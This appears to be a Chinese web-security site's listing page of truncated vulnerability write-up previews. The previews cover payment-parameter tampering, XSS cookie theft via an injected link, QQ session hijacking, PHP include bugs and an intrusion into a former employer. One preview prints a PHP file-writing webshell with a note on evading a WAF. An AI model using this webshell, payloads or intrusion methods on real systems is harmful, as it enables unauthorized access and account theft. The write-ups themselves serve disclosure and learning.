主机屋可通过修改参数可免费购买域名空间(充值刷钱漏洞)
http://www.zhujiwu.com/domain/
域名注册,随便输入,然后注册。
修改购买时长参数。
<li id="1|年" style="color: rgb(153, 153, 153); background: rgb(255, 255, 255);">1年</li>
中的</code>id="1|...
推荐函数: 一是PHP获取当前页面的网址: dedecms也是用的这个 代码如下:
//获得当前的脚本网址
function GetCurUrl()
{
if(!empty($_SERVER["REQUEST_URI"]))
{
$scriptName = $_SERVER["REQUEST_URI"];
$nowurl = $scriptName;
}
else
{
$scriptName = $_SERVER["PHP_SELF"];
i...
友情链接过滤不严格,导致可以进行DOM结构注入。从而注入js攻击。 另外cookie重要的登录项无httponly 保护,从而可以得到其他用户的登录会话。
发生问题的地方。 增加友情链接 http://dl528888.blog.51cto.com/mod/edit_flink.php?type=addflink&uid=1030776&flink=www.iamle.com%22%20onmousemov...
了解常见的PHP应用程序安全威胁,可以确保你的PHP应用程序不受攻击。因此,本文将列出 6个常见的 PHP 安全性攻击,欢迎大家来阅读和学习。
1、SQL注入
SQL注入是一种恶意攻击,用户利用在表单字段输入SQL语句的方式来影响正常的SQL执行。还有一种是通过system()或exec()命令注入的,它具有相同的SQL...
这个可以说没有技术含量, 只是说个思路, 先简单演示下.
1.打开burp 设置好浏览器代理然后点下QQ面板里的QQ空间快捷登陆可以看到burp拦截了,主要就是拦截到的这段RUL
2.把这个URL复制下下来拿到内网其它机器用浏览器打开,可以发现在直接是登陆状态
3.但如果把这个URL拿到外网就不行了...
事情是这样的,有一段时间在A公司实习过,就想渗透A公司,各种工具各种扫,终于发现一个注入点,拿到了后台的密码,登陆进去之后,没有利用的地方,上传点卡的特别严,即使传上图片去,能浏览图片,但是不知道图片的实际地址,没有旁站,算了,还是c段吧,引出了下边的故事。
御剑,wwwscan各种扫...
直接上代码:
<?php
$p=realpath(dirname(__FILE__)."/../").$_POST["a"];
$t=$_POST["b"];
$tt="";
for ($i=0;$i<strlen($t);$i+=2) $tt.=urldecode("%".substr($t,$i,2));
@fwrite(fopen($p,"w"),$tt);
echo "success!";
?>
分析利用&过狗:
<?php
$p=realpath(dirnam...
留言处插入代码 获取到商家COOKIE 伪造COOKIE登录进去商家后台
然后就没有然后了。 修复方案: 过滤什么的 大家都懂得
上一篇: 赶集网手机弹窗执行xss指谁打谁 - 网站安全 - 自
下一篇: PHP包含漏洞学习 - 网站安全 - 自学php
* 学习 PHP 中,依然是搜索引擎加上个人实践的结果
**抛砖引玉~ **Author 音符 */
0x00 包含漏洞成因 首先需要了解include()函数与require()函数,他们会将所包含的任何格式的文件以php形式执行。 两个函数功能基本相同,此外只有当所包含的文件不存在的时候才会体现两个函数的不同,如...
0×01 起因
近来想了解一下云端开发平台,本来并没有日站的打算,算是偶遇这一奇葩站, 随便翻了翻,发现有点搞头
0×02 开搞 这个地址让我想到了任意下载,所以手贱就测试了一下
好吧,路径都出来了,我最...